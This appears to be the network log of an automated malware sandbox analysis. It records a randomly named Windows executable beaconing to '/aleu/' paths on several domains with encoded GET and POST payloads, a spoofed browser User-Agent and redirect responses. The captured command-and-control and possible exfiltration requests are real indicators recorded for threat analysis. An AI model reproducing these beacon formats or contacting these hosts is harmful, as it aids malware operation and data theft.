                                                                                                                                                                                                        Data Raw: 6a 6e 34 6c 4e 62 3d 73 63 4b 30 58 4e 46 79 31 35 42 4c 43 6e 49 71 54 64 37 4e 57 30 58 30 49 70 6c 79 4d 6d 35 68 32 45 43 76 68 35 33 4b 56 41 2b 41 4f 56 70 77 58 4e 79 51 64 52 56 45 62 31 50 58 62 68 43 47 4c 7a 57 4d 54 69 6b 59 76 50 55 47 6e 79 61 41 43 54 41 6e 70 4a 6e 6c 58 33 66 79 38 65 66 36 47 7a 56 54 32 6c 52 79 6f 38 37 45 52 41 37 55 41 4b 70 39 59 55 42 7a 45 62 73 50 67 67 34 72 41 56 5a 6c 63 44 51 62 68 69 77 71 36 6b 6f 66 46 49 4e 32 37 38 31 51 4c 63 47 6c 33 78 67 38 38 61 46 64 5a 67 31 4d 74 6b 46 7a 76 52 67 43 42 77 67 4b 67 69 44 49 71 48 6e 7a 73 55 76 49 4f 58 6f 38 51 64 46 6b 65 34 50 4c 4a 6f 4a 53 6d 4a 75 34 5a 79 67 57 62 4a 52 42 61 59 36 78 5a 4c 4d 41 76 34 70 63 76 57 68 6c 39 30 56 4b 49 67 73 54 30 66 38 43 53 61 47 4e 32 56 49 6e 4d 53 64 42 66 57 43 47 4c 6e 6d 36 63 51 4a 4c 68 69 64 59 34 4f 43 59 63 32 2b 34 42 70 6b 36 78 6a 53 51 59 5a 70 50 4e 46 63 42 50 71 57 65 51 67 7a 54 38 58 37 55 35 77 54 72 6e 76 49 57 4d 59 78 72 52 46 4a 55 4c 61 6e [TRUNCATED]
                                                                                                                                                                                                        Data Ascii: jn4lNb=scK0XNFy15BLCnIqTd7NW0X0IplyMm5h2ECvh53KVA+AOVpwXNyQdRVEb1PXbhCGLzWMTikYvPUGnyaACTAnpJnlX3fy8ef6GzVT2lRyo87ERA7UAKp9YUBzEbsPgg4rAVZlcDQbhiwq6kofFIN2781QLcGl3xg88aFdZg1MtkFzvRgCBwgKgiDIqHnzsUvIOXo8QdFke4PLJoJSmJu4ZygWbJRBaY6xZLMAv4pcvWhl90VKIgsT0f8CSaGN2VInMSdBfWCGLnm6cQJLhidY4OCYc2+4Bpk6xjSQYZpPNFcBPqWeQgzT8X7U5wTrnvIWMYxrRFJULankjfei4ke8QHdUgPPOju8V0t1rhMBUYrwLN1ItpUDjWuBgbKSmor75Vp5vBpERD5UUK0smRwLvUW7XjQh4f8jS/5G/7NH3I1aIge9imIi60VK99oxczKRBgKTKVGqQiPz8GBnKbPtGmuNTqRJrP8XQCdA/8/cUqG350brSSVkIZVv2GpLRDo+s9rKqwvbLhhauazxFY2b9edJdGPzY8Ieh9Zsod9BtYqsFTjPX4bda52+Fc+OKXYg1EWyevnwZFUDWalrAfYLrlEX+J5tMLXQASsmNkgDgI2qfhD1cExNcWBvT6DeRdnnWMhIpOoxchOFmAscvl9nUWZuxK+bom2j5SrNiadMCXWkO+TKsY3mJn2T4ZufdF8bmK0DXF5ju8JjemOiFEeZptyKprq1z64xHyzSoa/JXVw2fCUaevpnCHEmGIv3PS3UgFpm6btl5aGqVYjO/WpW1uUju9UAMI8zuUBaF0+xrKNaeFFmPM5JnNX6YEzfNueGxIh3CrYmH+qorO4PP8qzBjGqNDC0i4/WZxQEqAvNAXy3OW8QheSJy6tgogUgd6+oy0JNfTsQuWbmFFMsLvJT8McIMTnSf7Ceo/k1oEf7yCh6KhDLwVXE3vVO3PeTgu00mGa7su72K6RV5b5KmICO0EUk4d/HwnNBrUuWrVXymKMaRR [TRUNCATED]
                                                                                                                                                                                                        May 8, 2024 18:21:26.772283077 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:21:26 GMT
                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                        X-ServerIndex: llim604
                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Data Raw: 31 65 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 61 6c 71 75 69 6c 65 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 24 52 45 47 49 53 54 52 41 4e 54 31 20 24 52 45 47 49 53 54 52 41 4e 54 32 20 24 52 45 47 49 53 54 52 41 4e 54 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 73 79 73 2e 65 73 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 [TRUNCATED]
                                                                                                                                                                                                        Data Ascii: 1ebe<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.colchondealquiler.com</title> <meta name="description" content="$REGISTRANT1 $REGISTRANT2 $REGISTRANT3" /> <link rel="stylesheet" href="https://arsys.es/css/parking2.css"> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <i class="icon-seguimiento"></i> <p>Esta es la p&aacute;gina de:</p> <h1>www.colchondealquiler.com</h1> </div> ...COMIENZA_TEXTO_REGISTRANTE-->...TERMINA [TRUNCATED]
                                                                                                                                                                                                        May 8, 2024 18:21:26.772459030 CEST1289INData Raw: 54 45 52 4d 49 4e 41 5f 43 4f 4d 45 4e 54 41 52 49 4f 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 43 4f 4d 49 45 4e 5a 41 5f 50 49 45 5f 50 45 52 53 4f 4e 41 4c 2d 2d 3e 3c 21 2d 2d 54 45 52 4d 49 4e 41 5f 50 49 45 5f 50 45 52 53 4f 4e 41
                                                                                                                                                                                                        Data Ascii: TERMINA_COMENTARIO--> ...COMIENZA_PIE_PERSONAL-->...TERMINA_PIE_PERSONAL--> </div> <div class="back" style="background-color:#;"></div></header><section class="search"> <div class="center"> <span>busca tu
                                                                                                                                                                                                        May 8, 2024 18:21:26.772473097 CEST1289INData Raw: 20 70 72 6f 66 65 73 69 6f 6e 61 6c 3c 2f 61 3e 20 63 6f 6e 20 74 75 20 6e 6f 6d 62 72 65 20 64 65 20 64 6f 6d 69 6e 69 6f 20 64 65 73 64 65 20 63 75 61 6c 71 75 69 65 72 20 64 69 73 70 6f 73 69 74 69 76 6f 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: profesional</a> con tu nombre de dominio desde cualquier dispositivo.</p> </article> <article> <h2>Certificado SSL</h2> <p>Evita que tu web se muestre como "no segura" con el <a href="https://www.a
                                                                                                                                                                                                        May 8, 2024 18:21:26.772486925 CEST1289INData Raw: 20 4f 6e 6c 69 6e 65 22 3e 54 69 65 6e 64 61 20 4f 6e 6c 69 6e 65 3c 2f 61 3e 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 3c 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: Online">Tienda Online</a>.</p> </article> ...<article> <h2>Posicionamiento SEO</h2> <p>Optimiza la <a href="https://www.arsys.es/herramientas/seo?utm_source=parking&amp;utm_medium=link&amp;utm_camp
                                                                                                                                                                                                        May 8, 2024 18:21:26.772499084 CEST1289INData Raw: 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 76 70 73 22 20 74 69 74 6c 65 3d 22 53 65 72 76 69 64 6f 72 20 56 50 53 22 3e 73 65 72 76 69 64 6f 72 20 56 50 53 3c 2f 61 3e 3a 20 70 6f 74 65 6e 63 69 61 20 79 20 72 65 6e 64 69 6d 69 65 6e 74 6f 20 63 6f 6e
                                                                                                                                                                                                        Data Ascii: tm_campaign=vps" title="Servidor VPS">servidor VPS</a>: potencia y rendimiento con transferencia ilimitada.</p> </article> <article> <h2>Servidor Dedicado</h2> <p>Administra tu propio <a href="https:
                                                                                                                                                                                                        May 8, 2024 18:21:26.772512913 CEST1289INData Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 53 6f 6c 75 63 69 6f 6e 65 73 20 61 20 4d 65 64 69 64 61 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 50 65 6e 73 61 6e 64 6f 20 65 6e 20 63 61 64 61 20 63 6c 69 65 6e
                                                                                                                                                                                                        Data Ascii: > <h2>Soluciones a Medida</h2> <p>Pensando en cada cliente para ofrecerle una <a href="https://www.arsys.es/soluciones?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=solutions" title="Solucin empresarial a
                                                                                                                                                                                                        May 8, 2024 18:21:26.772527933 CEST365INData Raw: 63 74 6f 72 28 27 6c 61 62 65 6c 5b 66 6f 72 3d 64 6f 6d 5d 27 29 2e 69 6e 6e 65 72 48 54 4d 4c 20 2b 20 64 6f 6d 61 69 6e 53 65 61 72 63 68 54 65 78 74 5b 64 6f 6d 61 69 6e 53 65 61 72 63 68 43 68 61 72 5d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: ctor('label[for=dom]').innerHTML + domainSearchText[domainSearchChar]; domainSearchChar++; } else { domainSearchChar = 0; document.querySelector('label[for=dom]').innerHTML = '';


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        8192.168.2.449752217.76.128.34804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:21:29.283236980 CEST486OUTGET /aleu/?jn4lNb=heiUU9lLv45IJG5VBKLzBQ/QU5pXOEZ122KPvL/NNDCzNkInOevyA08bejzsewnbLAKBPzZGyeY+skKwUgloq+HQclTA5c3JDTwCxVF3w8TOe3DJCoRyHmQ=&jvudu=jXz4lVThP2GL4N HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Host: www.colchondealquiler.com
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        May 8, 2024 18:21:29.612488031 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:21:29 GMT
                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                        X-ServerIndex: llim603
                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Data Raw: 31 65 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 61 6c 71 75 69 6c 65 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 24 52 45 47 49 53 54 52 41 4e 54 31 20 24 52 45 47 49 53 54 52 41 4e 54 32 20 24 52 45 47 49 53 54 52 41 4e 54 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 73 79 73 2e 65 73 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 [TRUNCATED]
                                                                                                                                                                                                        Data Ascii: 1ebe<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.colchondealquiler.com</title> <meta name="description" content="$REGISTRANT1 $REGISTRANT2 $REGISTRANT3" /> <link rel="stylesheet" href="https://arsys.es/css/parking2.css"> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <i class="icon-seguimiento"></i> <p>Esta es la p&aacute;gina de:</p> <h1>www.colchondealquiler.com</h1> </div> ...COMIENZA_TEXTO_REGISTRANTE-->...TERMINA [TRUNCATED]
                                                                                                                                                                                                        May 8, 2024 18:21:29.612510920 CEST1289INData Raw: 54 45 52 4d 49 4e 41 5f 43 4f 4d 45 4e 54 41 52 49 4f 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 43 4f 4d 49 45 4e 5a 41 5f 50 49 45 5f 50 45 52 53 4f 4e 41 4c 2d 2d 3e 3c 21 2d 2d 54 45 52 4d 49 4e 41 5f 50 49 45 5f 50 45 52 53 4f 4e 41
                                                                                                                                                                                                        Data Ascii: TERMINA_COMENTARIO--> ...COMIENZA_PIE_PERSONAL-->...TERMINA_PIE_PERSONAL--> </div> <div class="back" style="background-color:#;"></div></header><section class="search"> <div class="center"> <span>busca tu
                                                                                                                                                                                                        May 8, 2024 18:21:29.612524986 CEST1289INData Raw: 20 70 72 6f 66 65 73 69 6f 6e 61 6c 3c 2f 61 3e 20 63 6f 6e 20 74 75 20 6e 6f 6d 62 72 65 20 64 65 20 64 6f 6d 69 6e 69 6f 20 64 65 73 64 65 20 63 75 61 6c 71 75 69 65 72 20 64 69 73 70 6f 73 69 74 69 76 6f 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: profesional</a> con tu nombre de dominio desde cualquier dispositivo.</p> </article> <article> <h2>Certificado SSL</h2> <p>Evita que tu web se muestre como "no segura" con el <a href="https://www.a
                                                                                                                                                                                                        May 8, 2024 18:21:29.612540007 CEST1289INData Raw: 20 4f 6e 6c 69 6e 65 22 3e 54 69 65 6e 64 61 20 4f 6e 6c 69 6e 65 3c 2f 61 3e 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 3c 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: Online">Tienda Online</a>.</p> </article> ...<article> <h2>Posicionamiento SEO</h2> <p>Optimiza la <a href="https://www.arsys.es/herramientas/seo?utm_source=parking&amp;utm_medium=link&amp;utm_camp
                                                                                                                                                                                                        May 8, 2024 18:21:29.612554073 CEST1289INData Raw: 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 76 70 73 22 20 74 69 74 6c 65 3d 22 53 65 72 76 69 64 6f 72 20 56 50 53 22 3e 73 65 72 76 69 64 6f 72 20 56 50 53 3c 2f 61 3e 3a 20 70 6f 74 65 6e 63 69 61 20 79 20 72 65 6e 64 69 6d 69 65 6e 74 6f 20 63 6f 6e
                                                                                                                                                                                                        Data Ascii: tm_campaign=vps" title="Servidor VPS">servidor VPS</a>: potencia y rendimiento con transferencia ilimitada.</p> </article> <article> <h2>Servidor Dedicado</h2> <p>Administra tu propio <a href="https:
                                                                                                                                                                                                        May 8, 2024 18:21:29.612570047 CEST1289INData Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 53 6f 6c 75 63 69 6f 6e 65 73 20 61 20 4d 65 64 69 64 61 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 50 65 6e 73 61 6e 64 6f 20 65 6e 20 63 61 64 61 20 63 6c 69 65 6e
                                                                                                                                                                                                        Data Ascii: > <h2>Soluciones a Medida</h2> <p>Pensando en cada cliente para ofrecerle una <a href="https://www.arsys.es/soluciones?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=solutions" title="Solucin empresarial a
                                                                                                                                                                                                        May 8, 2024 18:21:29.612584114 CEST360INData Raw: 63 74 6f 72 28 27 6c 61 62 65 6c 5b 66 6f 72 3d 64 6f 6d 5d 27 29 2e 69 6e 6e 65 72 48 54 4d 4c 20 2b 20 64 6f 6d 61 69 6e 53 65 61 72 63 68 54 65 78 74 5b 64 6f 6d 61 69 6e 53 65 61 72 63 68 43 68 61 72 5d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: ctor('label[for=dom]').innerHTML + domainSearchText[domainSearchChar]; domainSearchChar++; } else { domainSearchChar = 0; document.querySelector('label[for=dom]').innerHTML = '';
                                                                                                                                                                                                        May 8, 2024 18:21:29.612596989 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        9192.168.2.44975313.94.60.40804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:21:35.859971046 CEST16INHTTP/1.1 200 OK
                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                        May 8, 2024 18:21:35.860001087 CEST323INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 36 30
                                                                                                                                                                                                        Data Ascii: Content-Type: text/html; charset=utf-8Connection: closeCache-Control: max-age=60Content-Length: 218<html><head><script>window.location.href= "https://x3nadr4oqr3b20ld.app" + "?p="+window.location.pathname + window.location.search.replace(


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        10192.168.2.44975413.94.60.40804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:21:38.846520901 CEST16INHTTP/1.1 200 OK
                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                        May 8, 2024 18:21:38.846544981 CEST323INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 36 30
                                                                                                                                                                                                        Data Ascii: Content-Type: text/html; charset=utf-8Connection: closeCache-Control: max-age=60Content-Length: 218<html><head><script>window.location.href= "https://x3nadr4oqr3b20ld.app" + "?p="+window.location.pathname + window.location.search.replace(
                                                                                                                                                                                                        May 8, 2024 18:21:40.923737049 CEST6OUTData Raw: 50
                                                                                                                                                                                                        Data Ascii: P


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        11192.168.2.44975513.94.60.40804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:21:43.029484034 CEST16INHTTP/1.1 200 OK
                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                        May 8, 2024 18:21:43.029504061 CEST323INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 36 30
                                                                                                                                                                                                        Data Ascii: Content-Type: text/html; charset=utf-8Connection: closeCache-Control: max-age=60Content-Length: 218<html><head><script>window.location.href= "https://x3nadr4oqr3b20ld.app" + "?p="+window.location.pathname + window.location.search.replace(


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        12192.168.2.44975613.94.60.40804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:21:45.874420881 CEST16INHTTP/1.1 200 OK
                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                        May 8, 2024 18:21:45.874439955 CEST323INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 36 30
                                                                                                                                                                                                        Data Ascii: Content-Type: text/html; charset=utf-8Connection: closeCache-Control: max-age=60Content-Length: 218<html><head><script>window.location.href= "https://x3nadr4oqr3b20ld.app" + "?p="+window.location.pathname + window.location.search.replace(
                                                                                                                                                                                                        May 8, 2024 18:21:53.217915058 CEST6OUTData Raw: 47
                                                                                                                                                                                                        Data Ascii: G
                                                                                                                                                                                                        May 8, 2024 18:22:05.827423096 CEST6OUTData Raw: 45
                                                                                                                                                                                                        Data Ascii: E
                                                                                                                                                                                                        May 8, 2024 18:22:27.075176001 CEST6OUTData Raw: 54
                                                                                                                                                                                                        Data Ascii: T


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        13192.168.2.449757178.211.137.59804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:21:51.727742910 CEST757OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        Host: www.skibinscy-finanse.pl
                                                                                                                                                                                                        Origin: http://www.skibinscy-finanse.pl
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        Content-Length: 203
                                                                                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Referer: http://www.skibinscy-finanse.pl/aleu/
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        Data Raw: 6a 6e 34 6c 4e 62 3d 41 32 48 59 2b 71 4a 42 4b 6a 2f 6d 49 66 6f 62 61 79 72 79 62 49 2f 65 6d 76 70 70 4f 30 78 31 78 64 39 38 32 56 6e 73 59 4c 2b 78 33 57 61 73 41 75 71 54 6f 4b 6a 37 6e 41 36 36 57 4d 4c 4a 61 6d 32 46 79 71 7a 73 4a 4a 78 76 64 77 75 7a 30 69 59 69 56 39 47 77 65 76 63 44 4d 34 58 65 63 49 41 67 4b 44 48 78 47 52 42 6e 6e 2b 36 4c 6a 32 56 54 50 39 35 38 4f 78 67 71 62 32 54 69 6a 75 62 36 4d 39 57 42 6c 72 4e 30 51 52 6c 39 65 61 44 4a 4c 51 49 68 4d 65 4e 66 41 43 2f 68 63 6b 2b 5a 59 58 48 5a 52 36 35 49 6c 6f 4c 77 32 68 7a 6d 2f 59 56 6c 69 5a 4a 39 61 67 79 50 65 51 3d 3d
                                                                                                                                                                                                        Data Ascii: jn4lNb=A2HY+qJBKj/mIfobayrybI/emvppO0x1xd982VnsYL+x3WasAuqToKj7nA66WMLJam2FyqzsJJxvdwuz0iYiV9GwevcDM4XecIAgKDHxGRBnn+6Lj2VTP958Oxgqb2Tijub6M9WBlrN0QRl9eaDJLQIhMeNfAC/hck+ZYXHZR65IloLw2hzm/YVliZJ9agyPeQ==
                                                                                                                                                                                                        May 8, 2024 18:21:52.061665058 CEST360INHTTP/1.1 404 Not Found
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:21:51 GMT
                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                        Content-Length: 196
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        14192.168.2.449758178.211.137.59804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:21:54.616086960 CEST777OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
